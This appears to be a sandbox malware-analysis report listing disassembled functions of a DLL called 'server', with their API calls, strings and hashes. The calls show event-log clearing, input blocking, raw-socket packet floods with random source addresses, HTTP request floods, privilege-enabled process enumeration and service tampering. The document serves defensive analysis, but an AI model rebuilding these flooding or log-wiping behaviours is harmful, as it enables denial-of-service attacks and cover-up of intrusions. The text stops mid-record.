Function 1000A4D0 Relevance: 4.5, APIs: 3, Instructions: 35COMMON

Download Yara Rule

APIs

OpenEventLogA.ADVAPI32(00000000), ref: 1000A50C
ClearEventLogA.ADVAPI32(00000000,00000000), ref: 1000A517
CloseEventLog.ADVAPI32(00000000), ref: 1000A51A

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Event$ClearCloseOpen
String ID:
API String ID: 1391105993-0
Opcode ID: 2e8b92724baef040b74a099688e4ca11ceeaa7323f097ad490cf6ea05752eb0a
Instruction ID: 2f13a3a00fc351755ca7788bc276ed95c0dd4850e5c3601e4dc9bed05caac4f8
Opcode Fuzzy Hash: 2e8b92724baef040b74a099688e4ca11ceeaa7323f097ad490cf6ea05752eb0a
Instruction Fuzzy Hash: 6EF096715057529BE300DF09CC80B5FBBE4FF85750F800908FA5497210D3B5AA598BEA

Function 1000F3A0 Relevance: 3.2, APIs: 2, Instructions: 152keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000000), ref: 1000F45C
BlockInput.USER32(?,?,?,00000000), ref: 1000F475

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 89eaa9efebe0b394a2daade3a841e7d355f6256b3a47bd97c9d23898dd999a22
Instruction ID: f75e578da579e437ca953510df7974459397082eec6ccbfe99a7c7589e24c54f
Opcode Fuzzy Hash: 89eaa9efebe0b394a2daade3a841e7d355f6256b3a47bd97c9d23898dd999a22
Instruction Fuzzy Hash: 4B411837B486849BC314DF98A441BBEFB75FBC6621F0086AFE85583B00CB366914D7A1

Function 10001800 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

hXMV, xrefs: 10001834
hXMV, xrefs: 10001849

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID:
String ID: hXMV$hXMV
API String ID: 0-400149659
Opcode ID: bb9fbec34bb74b578b789555242fbb2c4049be8c3a5e02f866b0156cd7be93d0
Instruction ID: 79a79fee38ca8a1330c9593f9425e5eef8b4821128400f5dbd5ea3b8bade0337
Opcode Fuzzy Hash: bb9fbec34bb74b578b789555242fbb2c4049be8c3a5e02f866b0156cd7be93d0
Instruction Fuzzy Hash: 08F0C272D08685AAD7008B4ADC51BAFFBB8E745B20F20422AE524537C1D63A18018AA0

Function 10002800 Relevance: 1.5, APIs: 1, Instructions: 10nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 10002814

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
Instruction ID: 58df3dc0681e3f39cf6c8608bd8a8251fa6d00a740b542f493d238d21b34862f
Opcode Fuzzy Hash: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
Instruction Fuzzy Hash: 0CC0EAB9608351AFD604CB54C888D6BB7E9EBC8340F00C909B59A83254C770E840CB22

Function 10025DC0 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4162b8fd09a8058dfffab31c4ebf9cf9939f72c70a79160d24adbb6f6ac3f189
Instruction ID: afa899698315f790dea508b65044e70b833291bd3a009e442af8b39958c29264
Opcode Fuzzy Hash: 4162b8fd09a8058dfffab31c4ebf9cf9939f72c70a79160d24adbb6f6ac3f189
Instruction Fuzzy Hash: 781182B2B68D170AFB1C55ACEC797793683E384319F1A9B3C570BC62C0DDBD69481198

Function 10005880 Relevance: 70.4, APIs: 34, Strings: 6, Instructions: 417stringnetworksleepCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 100058CD
strstr.MSVCRT ref: 1000590A
strstr.MSVCRT ref: 10005961
strcspn.MSVCRT ref: 1000598A
strncpy.MSVCRT ref: 10005996
strcspn.MSVCRT ref: 100059A2
strstr.MSVCRT ref: 100059AE
strcspn.MSVCRT ref: 100059CC
strncpy.MSVCRT ref: 100059D5
strcspn.MSVCRT ref: 100059E1
strstr.MSVCRT ref: 100059F4
strcspn.MSVCRT ref: 10005A19
strncpy.MSVCRT ref: 10005A25
strcspn.MSVCRT ref: 10005A31

Part of subcall function 100040D0: GetTickCount.KERNEL32 ref: 100040D1
Part of subcall function 100040D0: rand.MSVCRT ref: 100040D9

WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 10005AA5
setsockopt.WS2_32(00000000,00000000,00000002,?,00000004), ref: 10005ACF
setsockopt.WS2_32 ref: 10005AF4
htons.WS2_32 ref: 10005B14
inet_addr.WS2_32(1007DD2C), ref: 10005B26
htons.WS2_32(00000028), ref: 10005B3A
inet_addr.WS2_32(?), ref: 10005B6D
inet_addr.WS2_32(1007DD2C), ref: 10005B7A
htons.WS2_32(00000001), ref: 10005B91
htons.WS2_32(00000000), ref: 10005BA0
htonl.WS2_32(00000001), ref: 10005BB6
htons.WS2_32 ref: 10005BD3
htons.WS2_32 ref: 10005BEF
wsprintfA.USER32 ref: 10005CEE
inet_addr.WS2_32(?), ref: 10005D0F
htons.WS2_32(00000001), ref: 10005D2F
htonl.WS2_32(00000001), ref: 10005D45
sendto.WS2_32(?,?,00000028,00000000,?,00000010), ref: 10005E0F
printf.MSVCRT ref: 10005E1A
Sleep.KERNEL32(00000032), ref: 10005E25

Strings

@, xrefs: 10005B4B
192.168.1.244, xrefs: 10005A61
http://, xrefs: 100058A7, 10005904, 10005913
P, xrefs: 10005BC9
E, xrefs: 10005B31
%d.%d.%d.%d, xrefs: 10005CE8

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: htons$strcspn$strstr$inet_addr$strncpy$htonlsetsockopt$CountSleepSocketTickprintfrandsendtowsprintf
String ID: %d.%d.%d.%d$192.168.1.244$@$E$P$http://
API String ID: 322722939-1061493658
Opcode ID: fa133e97be830d63c3937d69d0e00783affe932c38cfb30cb5e04117bf83879f
Instruction ID: 029872f007aae8b741d3009860af6db6cc3886bdaffc2e790e906b1155b7fa43
Opcode Fuzzy Hash: fa133e97be830d63c3937d69d0e00783affe932c38cfb30cb5e04117bf83879f
Instruction Fuzzy Hash: DFE1E3715083859AE320CB74CC41BABB7E5FFC4344F004A1DFA9997291DA74AA49CB97

Function 10005190 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 293stringnetworkthreadCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 100051D4
strstr.MSVCRT ref: 1000520B
strstr.MSVCRT ref: 10005259
strcspn.MSVCRT ref: 1000527F
strncpy.MSVCRT ref: 10005288
strcspn.MSVCRT ref: 10005294
strstr.MSVCRT ref: 100052A0
strcspn.MSVCRT ref: 100052BE
strncpy.MSVCRT ref: 100052C7
strcspn.MSVCRT ref: 100052D3
strstr.MSVCRT ref: 100052F5
strcspn.MSVCRT ref: 10005317
strncpy.MSVCRT ref: 10005320
strcspn.MSVCRT ref: 1000532C
inet_addr.WS2_32 ref: 10005375
printf.MSVCRT ref: 10005397
inet_addr.WS2_32(1007DD2C), ref: 100053A1
gethostbyname.WS2_32(?), ref: 100053AC
inet_ntoa.WS2_32(?), ref: 100053C6
printf.MSVCRT ref: 100053D2
htons.WS2_32(00000000), ref: 100053DF
sprintf.MSVCRT ref: 1000541C
printf.MSVCRT ref: 1000542F
socket.WS2_32(00000002,00000001,00000000), ref: 1000544D
connect.WS2_32(00000000,?,00000010), ref: 10005462
send.WS2_32(00000000,?,?,00000000), ref: 1000548A
closesocket.WS2_32(00000000), ref: 10005491
printf.MSVCRT ref: 1000549C
printf.MSVCRT ref: 100054A3
Sleep.KERNEL32(00000032,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100054AA
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100054BC
RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100054C0
closesocket.WS2_32(00000000), ref: 100054C7
RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100054CF
closesocket.WS2_32(?), ref: 100054DA
RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100054E2

Strings

%s, xrefs: 1000542A
%s, xrefs: 100053CD
http://, xrefs: 100051B4, 10005205, 10005214
GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-, xrefs: 10005416

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: strcspn$printfstrstr$ExitThreadUserclosesocketstrncpy$Sleepinet_addr$connectgethostbynamehtonsinet_ntoasendsocketsprintf
String ID: %s$%s$GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-$http://
API String ID: 3360081097-1844242639
Opcode ID: a09e518b96f0db453f2d109b9515bce755ecc3f272282edc9d1fbb50c6695935
Instruction ID: e8874cd066fd205268a75987e0b1d8bfdcdc385e397420bfea7b2cf98142489c
Opcode Fuzzy Hash: a09e518b96f0db453f2d109b9515bce755ecc3f272282edc9d1fbb50c6695935
Instruction Fuzzy Hash: 9F91E6325043146BE304DB74CC84AAB7BE9EFC9351F044A18FA5693290DFB5EA49C795

Function 10005F50 Relevance: 63.3, APIs: 34, Strings: 2, Instructions: 306stringnetworkthreadCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 10005F94
strstr.MSVCRT ref: 10005FCB
strstr.MSVCRT ref: 10006019
strcspn.MSVCRT ref: 1000603B
strncpy.MSVCRT ref: 10006044
strcspn.MSVCRT ref: 10006050
strstr.MSVCRT ref: 1000605C
strcspn.MSVCRT ref: 1000607A
strncpy.MSVCRT ref: 10006083
strcspn.MSVCRT ref: 1000608F
strstr.MSVCRT ref: 100060A2
strcspn.MSVCRT ref: 100060C4
strncpy.MSVCRT ref: 100060CD
strcspn.MSVCRT ref: 100060D9
printf.MSVCRT ref: 10006113
WSASocketA.WS2_32(00000002,00000003,00000001,00000000,00000000,00000001), ref: 10006128
setsockopt.WS2_32 ref: 10006153
inet_addr.WS2_32(?), ref: 10006184
inet_addr.WS2_32(?), ref: 1000618F
gethostbyname.WS2_32(?), ref: 1000619A
inet_ntoa.WS2_32(?), ref: 100061B4
printf.MSVCRT ref: 100061C0
GetTickCount.KERNEL32 ref: 100061E1
time.MSVCRT ref: 100061EE
srand.MSVCRT ref: 100061F5
rand.MSVCRT ref: 1000622E
GetTickCount.KERNEL32 ref: 1000627D
sendto.WS2_32(00000000,?,00000027,00000000,?,00000010), ref: 100062B7
printf.MSVCRT ref: 100062CC
Sleep.KERNEL32(00000032,?,?,?,?,00000004), ref: 100062D7
closesocket.WS2_32(00000000), ref: 100062DE
WSACleanup.WS2_32 ref: 100062E4
RtlExitUserThread.NTDLL(00000000,?,?,?,?,00000004), ref: 100062EC
RtlExitUserThread.NTDLL(00000000,?,?,?,?,00000004), ref: 100062F4

Strings

http://, xrefs: 10005F74, 10005FC5, 10005FD4
%s, xrefs: 1000610E, 100061BB

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: strcspn$strstr$printfstrncpy$CountExitThreadTickUserinet_addr$CleanupSleepSocketclosesocketgethostbynameinet_ntoarandsendtosetsockoptsrandtime
String ID: %s$http://
API String ID: 2910787541-1591606595
Opcode ID: 714e4b3f82d11a8d2cdf065614fefdc8eb5a61599fc4361ed26ed8b059713b7f
Instruction ID: 34865b7dc30fd38a5ae5f0f06fbf564a450e17f044507f999930ee5d5a8d3fda
Opcode Fuzzy Hash: 714e4b3f82d11a8d2cdf065614fefdc8eb5a61599fc4361ed26ed8b059713b7f
Instruction Fuzzy Hash: 78A1E5315043516BE314DB74CC84AAB7BEAFFC8350F404A2DF65697290EFB49A48CB96

Function 10011930 Relevance: 61.6, APIs: 33, Strings: 2, Instructions: 327stringsleepprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00001F40,00001F40), ref: 100119D6
LocalAlloc.KERNEL32 ref: 10011A04
Sleep.KERNEL32(00000001), ref: 10011A19
Process32First.KERNEL32(00000000,?), ref: 10011A28
OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?), ref: 10011A4B
EnumProcessModules.PSAPI(00000000,00000040,00000004,?,?,00000000,?), ref: 10011A85
GetModuleFileNameExA.PSAPI(00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011A9D
GetPriorityClass.KERNEL32(00000000,00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011AA9
wsprintfA.USER32 ref: 10011B3F
lstrlen.KERNEL32(?,?,?,?,00000002,00000000,00001F40,00001F40), ref: 10011B75
lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011B7E
lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011B87

Strings

SeDebugPrivilege, xrefs: 100119C1, 10011D03
SYSTEM, xrefs: 100119A0

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Process$lstrlen$Open$AllocClassCreateCurrentEnumFileFirstLocalModuleModulesNamePriorityProcess32SleepSnapshotTokenToolhelp32wsprintf
String ID: SYSTEM$SeDebugPrivilege
API String ID: 1285126458-3052852743
Opcode ID: 603ccc89775ea0e1e94ae0ec46c0b3118b3e6a6ea331a101648a88a52926951f
Instruction ID: 0b961047b44daba82c00bbc082a7763861cb1e17bb1e44bbf086e1eb6c632ac9
Opcode Fuzzy Hash: 603ccc89775ea0e1e94ae0ec46c0b3118b3e6a6ea331a101648a88a52926951f
Instruction Fuzzy Hash: 29B1A2712083459BE718CB24CC91AEFB3E6FBC4704F41492CFA8597240EB79E949CB96

Function 10004310 Relevance: 54.5, APIs: 26, Strings: 5, Instructions: 242networksleepthreadCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 10004326
WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 10004359
setsockopt.WS2_32(00000000,00000000,00000002,?,00000004), ref: 10004384
setsockopt.WS2_32 ref: 100043A9
htons.WS2_32 ref: 100043C9
inet_addr.WS2_32(1007DD2C), ref: 100043D5
rand.MSVCRT ref: 10004460
rand.MSVCRT ref: 10004474
rand.MSVCRT ref: 10004480
rand.MSVCRT ref: 1000448C
rand.MSVCRT ref: 10004498
sprintf.MSVCRT ref: 100044AE
htons.WS2_32(00000028), ref: 100044B9
inet_addr.WS2_32 ref: 100044D0
rand.MSVCRT ref: 100044E4
htons.WS2_32 ref: 100044EF
htons.WS2_32(00000000), ref: 100044FE
rand.MSVCRT ref: 10004505
htonl.WS2_32 ref: 10004511
rand.MSVCRT ref: 1000451B
rand.MSVCRT ref: 10004529
htons.WS2_32(00000200), ref: 10004548
htons.WS2_32(00000014), ref: 10004558
sendto.WS2_32(?,?,00000028,00000000,?,00000010), ref: 10004617
Sleep.KERNEL32(00000032,?,?,?,?,?,?), ref: 1000462E
RtlExitUserThread.NTDLL(00000000,?,?,?,?,00000000), ref: 10004644

Strings

E, xrefs: 10004415
P, xrefs: 1000442E
d, xrefs: 10004450
%d.%d.%d.%d, xrefs: 100044A8
@, xrefs: 10004423

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: rand$htons$inet_addrsetsockopt$ExitSleepSocketStartupThreadUserhtonlsendtosprintf
String ID: %d.%d.%d.%d$@$E$P$d
API String ID: 872198723-3606021318
Opcode ID: a2e921a84f5a9370c1cbf23c0c7c279e28e6e32964bf80e14801a405c00669c0
Instruction ID: 8a7fd5c6b9d9dc2a36ee797d2ff7afdd41ddcd881716b64bea6de97d131c0ef0
Opcode Fuzzy Hash: a2e921a84f5a9370c1cbf23c0c7c279e28e6e32964bf80e14801a405c00669c0
Instruction Fuzzy Hash: 1181C0701483959AE310CF64CC80BABBBE6FFC9704F00491DF699972A1DBB49909CB5B

Function 10006410 Relevance: 52.8, APIs: 28, Strings: 2, Instructions: 263stringnetworkthreadCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 10006454
strstr.MSVCRT ref: 1000648B
strstr.MSVCRT ref: 100064D9
strcspn.MSVCRT ref: 100064FB
strncpy.MSVCRT ref: 10006504
strcspn.MSVCRT ref: 10006510
strstr.MSVCRT ref: 1000651C
strcspn.MSVCRT ref: 1000653A
strncpy.MSVCRT ref: 10006543
strcspn.MSVCRT ref: 1000654F
strstr.MSVCRT ref: 10006562
strcspn.MSVCRT ref: 10006584
strncpy.MSVCRT ref: 1000658D
strcspn.MSVCRT ref: 10006599
time.MSVCRT(00000000), ref: 100065C5
srand.MSVCRT ref: 100065CC
rand.MSVCRT ref: 100065E8
inet_addr.WS2_32(?), ref: 10006631
htons.WS2_32(00000000), ref: 1000663F
printf.MSVCRT ref: 1000665A
inet_addr.WS2_32(?), ref: 10006668
gethostbyname.WS2_32(?), ref: 10006673
socket.WS2_32(00000002,00000002,00000000), ref: 1000668E
sendto.WS2_32(00000000,?,0000012B,00000000,?,00000010), ref: 100066B5
Sleep.KERNEL32(00000032), ref: 100066C7
closesocket.WS2_32(00000000), ref: 100066CE
RtlExitUserThread.NTDLL(00000000), ref: 100066D6
RtlExitUserThread.NTDLL(00000000), ref: 100066DE

Strings

%s:%d, xrefs: 10006655
http://, xrefs: 10006434, 10006485, 10006494

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: strcspn$strstr$strncpy$ExitThreadUserinet_addr$Sleepclosesocketgethostbynamehtonsprintfrandsendtosocketsrandtime
String ID: %s:%d$http://
API String ID: 3986318173-1702654977
Opcode ID: b18c302a20b414ba0b999612ed69bf70c16094a003d45a29b836c5755b60ace6
Instruction ID: 13eb3fa513dba6a830c19df937ef2a65af92b20ba7af4015ac3123da307f7ed1
Opcode Fuzzy Hash: b18c302a20b414ba0b999612ed69bf70c16094a003d45a29b836c5755b60ace6
Instruction Fuzzy Hash: BD81F3325043155BE704DF748C84AAB7AEAEFC9350F044A1DFA5697290EFB4DE08C795

Function 10010C90 Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 250servicesleepregistryCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010CF2
OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010D07
QueryServiceStatus.ADVAPI32(00000000,?), ref: 10010D29
ControlService.ADVAPI32(00000000,00000001,?), ref: 10010D4A
Sleep.KERNEL32(00000320), ref: 10010D5D
DeleteService.ADVAPI32(00000000), ref: 10010D64
RegDeleteKeyA.ADVAPI32(80000002,?), ref: 10010DCB
OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010E1C
OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010E33
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010E48
CloseServiceHandle.ADVAPI32(00000000), ref: 10010E4F
OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010E61
OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010E78
LockServiceDatabase.ADVAPI32(00000000), ref: 10010E89
OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 10010EAE
OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010EC5
LockServiceDatabase.ADVAPI32(00000000), ref: 10010ED6
OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010EFB
OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010F12
ControlService.ADVAPI32(00000000,00000001,?), ref: 10010F28
CloseServiceHandle.ADVAPI32(00000000), ref: 10010F2F
OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 10010F3E
OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010F51
LockServiceDatabase.ADVAPI32(00000000), ref: 10010F5E
ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10010F7B
UnlockServiceDatabase.ADVAPI32(00000000), ref: 10010F82
CloseServiceHandle.ADVAPI32(00000000), ref: 10010F89
CloseServiceHandle.ADVAPI32(00000000), ref: 10010F90
Sleep.KERNEL32(000001F4), ref: 10010F9B

Strings

SYSTEM\CurrentControlSet\Services\, xrefs: 10010D70

Memory Dump Source

